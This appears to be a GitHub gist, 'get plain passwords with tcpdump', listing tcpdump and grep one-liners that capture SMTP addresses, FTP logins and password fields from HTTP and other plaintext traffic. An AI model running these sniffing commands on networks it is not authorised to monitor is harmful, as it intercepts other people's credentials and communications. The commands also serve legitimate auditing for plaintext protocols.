Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
get plain passwords with tcpdump

Capture SMTP Email

tcpdump -nn -l port 25 | grep -i 'MAIL FROM\|RCPT TO'

Extract HTTP Passwords in POST Requests

tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"

Capture FTP Credentials and Commands

tcpdump -nn -v port ftp or ftp-data

Capture all plaintext passwords

tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -l -A | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.